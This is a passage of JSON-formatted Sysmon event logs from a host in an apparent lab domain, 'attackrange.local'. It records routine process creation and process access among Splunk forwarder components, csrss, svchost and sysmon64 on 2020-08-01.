(x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.814\r\nProcessGuid: {E2A3D6B1-10EA-5F25-0000-00109C340500}\r\nProcessId: 2424\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.814","ProcessGuid":"{E2A3D6B1-10EA-5F25-0000-00109C340500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10EA-5F25-0000-00109C340500}\r\nTargetProcessId: 2424\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10EA-5F25-0000-00109C340500}","TargetProcessId":"2424","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EA-5F25-0000-00109C340500}\r\nTargetProcessId: 2424\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EA-5F25-0000-00109C340500}","TargetProcessId":"2424","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.813\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.813","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
